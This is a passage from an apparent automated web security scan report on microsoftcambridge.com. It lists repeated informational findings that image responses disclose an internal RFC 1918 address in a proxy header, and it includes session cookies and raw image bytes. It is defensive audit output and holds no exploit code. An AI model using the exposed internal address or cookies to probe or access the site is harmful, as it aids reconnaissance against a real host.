...IHDR...,...%........    ....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.50. http://microsoftcambridge.com/Portals/0/home/welcome.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/home/welcome.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/home/welcome.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 26 Mar 2010 16:56:46 GMT
Content-Length: 4112
Date: Sat, 26 Mar 2011 01:40:25 GMT
X-Varnish: 1939058947
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.......!........ ....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.51. http://microsoftcambridge.com/Portals/0/people/PaulCoebergh_thumb.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/people/PaulCoebergh_thumb.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/people/PaulCoebergh_thumb.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Thu, 12 Feb 2009 04:31:07 GMT
Content-Length: 2010
Date: Sat, 26 Mar 2011 01:42:25 GMT
X-Varnish: 1939095915
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......E......Adobe.d........................................                .................................................................................................(.F..
...[SNIP]...
24.52. http://microsoftcambridge.com/Portals/0/people/SaraSpalding_thumb.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/people/SaraSpalding_thumb.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/people/SaraSpalding_thumb.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Thu, 12 Feb 2009 04:31:15 GMT
Content-Length: 1964
Date: Sat, 26 Mar 2011 01:42:26 GMT
X-Varnish: 1939096230
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......E......Adobe.d........................................                .................................................................................................(.F..
...[SNIP]...
24.53. http://microsoftcambridge.com/Portals/0/people/YaelKalai_thumb.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/people/YaelKalai_thumb.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/people/YaelKalai_thumb.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Thu, 12 Feb 2009 04:31:23 GMT
Content-Length: 1815
Date: Sat, 26 Mar 2011 01:42:26 GMT
X-Varnish: 1939096226
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......E......Adobe.d........................................                .................................................................................................(.F..
...[SNIP]...
24.54. http://microsoftcambridge.com/Portals/0/people/Yaelfeat.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/people/Yaelfeat.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/people/Yaelfeat.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Thu, 12 Feb 2009 04:31:24 GMT
Content-Length: 8486
Date: Sat, 26 Mar 2011 01:42:38 GMT
X-Varnish: 1939100112
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...
24.55. http://microsoftcambridge.com/Portals/0/people/YunGuo_thumb.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/people/YunGuo_thumb.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/people/YunGuo_thumb.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Thu, 12 Feb 2009 04:31:27 GMT
Content-Length: 1951
Date: Sat, 26 Mar 2011 01:42:26 GMT
X-Varnish: 1939096227
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......E......Adobe.d........................................                .................................................................................................(.F..
...[SNIP]...
24.56. http://microsoftcambridge.com/Portals/0/people/Yunfeat.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/people/Yunfeat.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/people/Yunfeat.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Thu, 12 Feb 2009 04:31:28 GMT
Content-Length: 12711
Date: Sat, 26 Mar 2011 01:42:17 GMT
X-Varnish: 1939093641
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......E......Adobe.d........................................                ......................................................................................................
...[SNIP]...
24.57. http://microsoftcambridge.com/Portals/0/people/dbrent_thumb.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/people/dbrent_thumb.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/people/dbrent_thumb.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Fri, 12 Mar 2010 19:02:59 GMT
Content-Length: 2416
Date: Sat, 26 Mar 2011 01:42:25 GMT
X-Varnish: 1939095916
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................(.F..
...[SNIP]...
24.58. http://microsoftcambridge.com/Portals/0/people/jhowe_thumb.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/people/jhowe_thumb.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/people/jhowe_thumb.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Fri, 12 Mar 2010 19:02:48 GMT
Content-Length: 2165
Date: Sat, 26 Mar 2011 01:42:26 GMT
X-Varnish: 1939096238
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................(.F..
...[SNIP]...
24.59. http://microsoftcambridge.com/Portals/0/people/lbrunson_thumb.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/people/lbrunson_thumb.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/people/lbrunson_thumb.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Fri, 12 Mar 2010 19:02:56 GMT
Content-Length: 2439
Date: Sat, 26 Mar 2011 01:42:25 GMT
X-Varnish: 1939095906
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................(.F..
...[SNIP]...
24.60. http://microsoftcambridge.com/Portals/0/people/people_right.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/people/people_right.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/people/people_right.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Mon, 24 Aug 2009 13:55:27 GMT
Content-Length: 3699
Date: Sat, 26 Mar 2011 01:42:25 GMT
X-Varnish: 1939095905
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...,...%........    ....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.61. http://microsoftcambridge.com/Portals/0/people/people_title.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/people/people_title.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/people/people_title.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 04:31:40 GMT
Content-Length: 4921
Date: Sat, 26 Mar 2011 01:42:22 GMT
X-Varnish: 1939095179
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.......!.......    .....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.62. http://microsoftcambridge.com/Portals/0/people/peopleh2_tsingh.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/people/peopleh2_tsingh.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/people/peopleh2_tsingh.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 12 Mar 2010 19:05:44 GMT
Content-Length: 1034
Date: Sat, 26 Mar 2011 01:42:22 GMT
X-Varnish: 1939095178
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.............    X6E....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Z...@......._:........%.%@    G    P.m:.[..;...f...E`.G3.c| ..O......."...4....P.'&m..e.......'.[N.F|f..J.O.y......    k..>....
...[SNIP]...
24.63. http://microsoftcambridge.com/Portals/0/people/tick.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/people/tick.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/people/tick.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 04:31:50 GMT
Content-Length: 2934
Date: Sat, 26 Mar 2011 01:42:25 GMT
X-Varnish: 1939095910
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.......    ......Sm.....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.64. http://microsoftcambridge.com/Portals/0/people/tsingh.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/people/tsingh.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/people/tsingh.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Fri, 12 Mar 2010 19:02:58 GMT
Content-Length: 24084
Date: Sat, 26 Mar 2011 01:42:25 GMT
X-Varnish: 1939095903
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......A......Adobe.d.........................    ....    
..    ..

....
...............................
   
................................................................|..
...[SNIP]...
24.65. http://microsoftcambridge.com/Portals/0/people/tsingh_thumb.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/people/tsingh_thumb.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/people/tsingh_thumb.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Fri, 12 Mar 2010 19:02:53 GMT
Content-Length: 2609
Date: Sat, 26 Mar 2011 01:42:26 GMT
X-Varnish: 1939096235
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................(.F..
...[SNIP]...
24.66. http://microsoftcambridge.com/Portals/0/rss.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/rss.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/rss.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 26 Jun 2009 18:39:17 GMT
Content-Length: 3024
Date: Sat, 26 Mar 2011 01:40:28 GMT
X-Varnish: 1939059718
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.............s+....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.67. http://microsoftcambridge.com/Portals/0/share_icons.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/share_icons.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/share_icons.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 13 Feb 2009 02:18:52 GMT
Content-Length: 6283
Date: Sat, 26 Mar 2011 01:40:28 GMT
X-Varnish: 1939059701
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR..............;......tEXtSoftware.Adobe ImageReadyq.e<...-IDATx..\....u=...._...V....!..},..6&`.P.A.....N.T!B.....WR...HREB...?..c,0v....6,.....~.........v.t.....gFZI,h..*..[....}..w.}
...[SNIP]...
24.68. http://microsoftcambridge.com/Portals/0/teams/ISC-header.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/ISC-header.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/ISC-header.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/ISC/tabid/341/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
